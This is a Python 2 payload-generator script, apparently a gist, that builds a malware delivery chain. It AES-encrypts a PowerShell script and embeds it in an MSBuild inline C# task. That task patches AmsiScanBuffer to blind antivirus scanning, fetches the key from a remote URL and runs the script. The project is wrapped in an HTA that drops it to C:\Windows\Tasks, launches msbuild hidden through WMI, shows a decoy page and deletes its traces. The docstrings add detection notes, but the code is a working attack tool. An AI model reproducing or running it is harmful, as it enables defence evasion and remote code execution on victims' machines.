#!/usr/bin/env python2.7 | |
import argparse | |
import binascii | |
import sys | |
import base64 | |
import hashlib | |
from Crypto.Cipher import AES | |
from pkcs7 import PKCS7Encoder | |
import random | |
from random import randint | |
import string | |
def create_powershell():
    """Return the PowerShell text that the generated chain will carry.

    The body is only a marker in this gist; whatever this function returns is
    passed through encrypt() by main(), so the PowerShell is embedded in the
    MSBuild project as ciphertext rather than in clear text.
    """
    posh_code = """
<INSERT POWERSHELL SCRIPT HERE>
"""
    return posh_code
def encrypt(x, y):
    """AES-CBC encrypt *y* under a key derived from *x*; return base64 text.

    Args:
        x: passphrase (``--key`` on the command line); a Python 2 byte string.
        y: plaintext to protect (the PowerShell from create_powershell()).

    Returns:
        Base64 encoding of the CBC ciphertext.

    Side effects:
        Writes the derived key plus a newline to ``key.txt`` in the current
        directory. The C# stage in the MSBuild project later downloads that
        same text from ``--url`` and strips the CR/LF before using it.

    Notes for reviewers / defenders:
        - The key is the 32-character hex digest of MD5(x) used directly as
          the key bytes (32 ASCII bytes, so AES-256 in PyCrypto terms, but the
          effective keyspace is bounded by MD5's 128-bit output and by the
          passphrase).
        - The IV is the fixed literal ``1234567812345678``; the C# decryptor
          hard-codes the same literal, so it is a static marker present in
          every project file this script emits.
    """
    key = hashlib.md5()
    key.update(x)
    key = key.hexdigest()
    # Persist the derived key; the stager expects this exact text at --url.
    with open("key.txt", "w") as key_file:
        key_file.write(key + '\n')
    iv = '1234567812345678'
    aes = AES.new(key, AES.MODE_CBC, iv)
    encoder = PKCS7Encoder()
    # PKCS#7 padding before CBC (PKCS7Encoder's default block size; presumably 16).
    pad_text = encoder.encode(y)
    cipher = aes.encrypt(pad_text)
    enc_cipher = base64.b64encode(cipher)
    return enc_cipher
def create_msbuild(x, y):
    """Return the MSBuild project XML that decrypts and runs the PowerShell.

    Args:
        x: URL from which the C# task downloads the AES key (the text that
           encrypt() wrote to ``key.txt``). Fills the ``URL`` property.
        y: base64 ciphertext from encrypt(); fills ``encryptedScript``.

    The template is an inline-task project (``CodeTaskFactory`` against
    Microsoft.Build.Tasks.v4.0.dll) whose ``Run`` target invokes the C#
    ``MyClass.Execute()``. That method:
      1. Builds the strings ``AmsiScanBuffer`` and ``amsi.dll`` from char
         arrays (presumably so the literals do not appear in the XML),
         resolves the export with LoadLibrary/GetProcAddress, makes the page
         writable with VirtualProtect(0x40 = PAGE_EXECUTE_READWRITE) and
         overwrites the first 6 bytes with ``B8 57 00 07 80 C3``, which reads
         as ``mov eax, 0x80070057; ret`` -- i.e. AMSI scan requests from this
         process return E_INVALIDARG immediately without inspecting the buffer.
      2. If ``URL`` is not ``None``: prints the URL to the console, fetches
         the key with WebClient.DownloadString, strips CR/LF, and decrypts
         ``encryptedScript`` with DecryptAES.Decrypt. The UTF-8 -> base64 ->
         ASCII round trip that follows is a no-op for ASCII text.
      3. Runs the result in an in-process PowerShell runspace
         (System.Management.Automation) via RunPSCommand; the pipeline output
         collected through Out-String is returned but discarded by Execute().

    DecryptAES uses AesManaged with the key bytes taken verbatim from the
    downloaded text and the same fixed IV as encrypt(); it relies on
    AesManaged's defaults (presumably CBC/PKCS7) to match the Python side.
    ``RunspaceInvoke scriptInvoker`` is created but never used.

    Detection notes: msbuild.exe loading System.Management.Automation.dll, an
    in-process write to the ``AmsiScanBuffer`` export of amsi.dll, and an
    outbound request to the key URL from msbuild.exe are the observable
    behaviours; the fixed IV literal and the ``MSUpdate.xml`` comment are
    static markers in the project file itself.
    """
    xml = """
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe MSUpdate.xml -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''"></FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
<URL Condition="'$(URL)' == ''">%s</URL>
</PropertyGroup>
<Target Name="Run">
<MyClass />
</Target>
<UsingTask
TaskName="MyClass"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Security.Cryptography;
using System.Linq;
public class MyClass : Task, ITask
{
public string funcName = "$(FunctionName)";
public string Cmd = "$(Cmd)";
public string URL = "$(URL)";
public string encScript = "";
public string encryptedScript = "";
public string decryptedString = "";
public string x = "";
public string newKey = "";
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
public override bool Execute()
{
char[] chars = { 'A', 'm', 's', 'i', 'S', 'c', 'a', 'n', 'B', 'u', 'f', 'f', 'e', 'r' };
String funcName = string.Join("", chars);
char[] chars2 = { 'a', 'm', 's', 'i', '.', 'd', 'l', 'l' };
String libName = string.Join("", chars2);
IntPtr Address = GetProcAddress(LoadLibrary(libName), funcName);
UIntPtr size = (UIntPtr)5;
uint p = 0;
VirtualProtect(Address, size, 0x40, out p);
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(Patch, 0, Address, 6);
if (URL != "None")
{
var key = string.Empty;
using (var webClient = new System.Net.WebClient())
{
Console.Write(URL);
key = webClient.DownloadString(URL);
newKey = key.Replace( "\\r", "").Replace( "\\n", "" );
string encryptedScript = "%s";
string decryptedString = DecryptAES.Decrypt(encryptedScript, newKey);
var bytes = Encoding.UTF8.GetBytes(decryptedString);
var encScript = Convert.ToBase64String(bytes);
byte[] data = Convert.FromBase64String(encScript);
string x = Encoding.ASCII.GetString(data);
RunPSCommand(x);
}
}
return true;
}
public static string RunPSCommand(string cmd)
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(cmd);
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
public class DecryptAES
{
public static string Decrypt(string cipherText, string key)
{
string enc_cipher = cipherText;
var textEncoder = new UTF8Encoding();
var aes = new AesManaged();
aes.Key = textEncoder.GetBytes(key);
aes.IV = textEncoder.GetBytes("1234567812345678");
var decryptor = aes.CreateDecryptor();
var cipher = Convert.FromBase64String(enc_cipher);
var text_bytes = decryptor.TransformFinalBlock(cipher, 0, cipher.Length);
var text = textEncoder.GetString(text_bytes);
return text;
}
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
""" % (x, y)
    return xml
def create_hta(x, y, z):
    """Write ``<y>.hta`` to the current directory; it stages and launches the MSBuild project.

    Args:
        x: base64 text of the MSBuild project XML (main() encodes the output
           of create_msbuild()).
        y: base name of the HTA file; ``.hta`` is appended.
        z: URL the HTA opens in Internet Explorer as a decoy.

    Returns nothing; the only output is the file on disk.

    The local ``t`` is a random run of lowercase letters whose length is
    randint(0, 9) -- the upper bound is inclusive and an empty name is
    possible -- and becomes the base name of the dropped XML. The template's
    ``%s`` slots are filled, in order, with x, t, t, t, y, z, t.

    What the emitted VBScript does when the HTA is opened:
      1. Base64-decodes ``data`` through MSXML/ADODB.Stream and writes the
         result to ``C:\\Windows\\Tasks\\<t>.xml``.
      2. Starts msbuild.exe on that file through WMI ``Win32_Process.Create``
         with a hidden window (ShowWindow = 12), choosing the Framework64 or
         Framework path from ``Win32_Processor.AddressWidth``.
      3. Deletes its own ``<y>.hta`` with ``cmd.exe /c del``, opens ``z`` in
         a visible InternetExplorer.Application, busy-waits one second, then
         deletes the dropped XML and closes itself.
    ``RandomString()`` is defined and assigned to ``filename`` but never used;
    the dropped file name comes from ``t`` on the Python side.

    Detection notes: mshta.exe writing an .xml into C:\\Windows\\Tasks and
    msbuild.exe started with a project from that directory are the stable
    artefacts. Because the launches go through WMI, the process tree
    presumably shows the children under the WMI provider host rather than
    under mshta.exe -- confirm against your own telemetry before relying on
    parent/child rules. A ``cmd.exe /c del`` of an .hta in the user's
    working directory is a further indicator.
    """
    length = randint(0, 9)
    t = ''.join(random.choice(string.lowercase) for i in range(length))
    hta_name = y
    hta = """
<script language="VBScript">
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream 'As New Stream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write Binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
Set oNode = Nothing
Set oXML = Nothing
End Function
Dim data
data = "%s"
Dim content
content = Base64Decode(data)
function RandomString()
Randomize()
dim CharacterSetArray
CharacterSetArray = Array(_
Array(7, "abcdefghijklmnopqrstuvwxyz"), _
Array(1, "0123456789") _
)
dim i
dim j
dim Count
dim Chars
dim Index
dim Temp
for i = 0 to UBound(CharacterSetArray)
Count = CharacterSetArray(i)(0)
Chars = CharacterSetArray(i)(1)
for j = 1 to Count
Index = Int(Rnd() * Len(Chars)) + 1
Temp = Temp & Mid(Chars, Index, 1)
next
next
dim TemCopy
do until Len(Temp) = 0
Index = Int(Rnd() * Len(Temp)) + 1
TempCopy = TempCopy & Mid(Temp, Index, 1)
Temp = Mid(Temp, 1, Index - 1) & Mid(Temp, Index + 1)
loop
RandomString = TempCopy
end function
Dim filename
filename = RandomString()
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Windows\Tasks\\%s.xml",2,true)
objFileToWrite.WriteLine(content)
objFileToWrite.Close
Set objFileToWrite = Nothing
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
If GetObject("winmgmts:root\cimv2:Win32_Processor='cpu0'").AddressWidth _
= 64 Then
errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null , objConfig, intProcessID)
Else
errReturn = objProcess.Create("C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe c:\Windows\Tasks\\%s.xml", null, objConfig, intProcessID)
End If
dim fso: set fso = CreateObject("Scripting.FileSystemObject")
dim CurrentDirectory
CurrentDirectory = fso.GetAbsolutePathName(".")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\\\" & strComputer & "\\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("cmd.exe /c del %s.hta", CurrentDirectory, objConfig, intProcessID)
Dim IE
Dim MyDocument
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = 1
IE.navigate "%s"
Dim dteWait
dteWait = DateAdd("s", 1, Now())
Do Until (Now() > dteWait)
Loop
errReturn = objProcess.Create("cmd.exe /c del C:\\windows\\tasks\\%s.xml", CurrentDirectory, objConfig, intProcessID)
self.close
</script>
""" % (x, t, t, t, hta_name, z, t)
    # Written to the current working directory; no error handling, so a
    # permissions problem surfaces as an uncaught IOError.
    f = open(hta_name + ".hta", "w+")
    f.write(hta + '\n')
    f.close()
def main():
    """Command-line entry point: build the encrypted payload chain.

    Flags (all required):
        --key    passphrase fed to encrypt().
        --url    location the C# stage downloads the key from (the text
                 encrypt() writes to ``key.txt``).
        --decoy  URL the HTA opens in Internet Explorer.
        --hta    base name of the output HTA; ``.hta`` is appended.

    Outputs, both in the current directory: ``key.txt`` (from encrypt()) and
    ``<hta>.hta`` (from create_hta()). The PowerShell from
    create_powershell() is encrypted, embedded in the MSBuild project, and
    that project is base64-encoded and embedded in the HTA.
    """
    parser = argparse.ArgumentParser(description="Generate Payload")
    parser.add_argument('--key', help="AES Key or Passphrase", required=True)
    parser.add_argument('--url', help="URL to the key", required=True)
    parser.add_argument('--decoy', help="URL to decoy document", required=True)
    parser.add_argument('--hta', help="HTA file name. Extension added.", required=True)
    args = parser.parse_args()
    powershell = create_powershell()
    encrypted_powershell = encrypt(args.key, powershell)
    msbuild = create_msbuild(args.url, encrypted_powershell)
    # The whole project XML rides inside the HTA as one base64 string.
    encodedMSBuild = base64.b64encode(msbuild)
    create_hta(encodedMSBuild, args.hta, args.decoy)
# Script entry point; importing the module only defines the functions above.
if __name__ == "__main__":
    main()